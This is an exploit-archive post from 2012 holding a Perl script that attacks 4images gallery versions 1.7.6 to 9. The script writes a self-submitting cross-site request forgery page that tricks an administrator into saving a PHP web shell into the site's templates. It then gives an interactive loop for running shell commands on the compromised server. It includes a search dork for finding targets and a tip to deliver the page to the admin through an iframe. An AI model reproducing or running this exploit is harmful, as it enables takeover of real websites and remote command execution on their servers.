Home / exploits 4Images 1.7.6 Cross Site Request Forgery
Posted on 31 January 2012
#!/usr/bin/perl ######################################################################## # Title : 4images 1.7.6 > 9 Csrf inject php code # Author : Or4nG.M4n # Version : 1.7.6 > 9 # Homepage : http://www.4homepages.de/ # Dork : "Powered by 4images" # video : http://youtu.be/NYF_zC9hH54 # Thnks~#+----------------------------------+ # | xSs m4n i-Hmx h311c0d3 |.sp. abo.B4sil # | HcJ Cyb3r ahwak20o0 sa^Dev!L |.sp. r00ts3c # +----------------------------------+ # 4images 1.7.6 > 9 Csrf inject php code # vuln : template.php use LWP::UserAgent; use LWP::Simple; system("cls"); print " +----------------------------------------+ | 4images 1.7.6 > 9 csrf inject php code | | Or4nG.M4n : priv8te@hotmail.com | +----------------------------------------+ Loading ... "; sleep(3); print "http://tragt & path #"; $h = <STDIN>; chomp $h; $html = '<form action="'.$h.'/admin/templates.php" name="csrf" method="post"> <input type="hidden" name="action" value="savetemplate"> <textarea name="content" cols="0" rows="0" > <?php $cmd = $_GET["cmd"]; print " __Code__ "; @system($cmd); print " __Code__ "; ?> </textarea> <input type="hidden" name="template_file_name" value="inject.php"> <input type="hidden" name="template_folder" value="default"> <script>document.csrf.submit();</script> </form>'; sleep(2); print "Createing ... "; open(XSS , '>>csrf.htm'); print XSS $html; close(XSS); print "Createing Done .. "; sleep(2); print "Now give csrf.htm to admin or useing iframe code "; sleep(1); print " if you done hit any key to continue"; $continue = <>; for($ops=0;$ops<15;$ops++) { print " Command# "; $execut =<STDIN>; chomp($execut); $ex = $h."/templates/default/inject.php?cmd=".$execut; my $content = get $ex; while($content =~ m{__Code__(.*?)__code__(.*)}g){ print " [+]Executing "; } print $content; } # The End
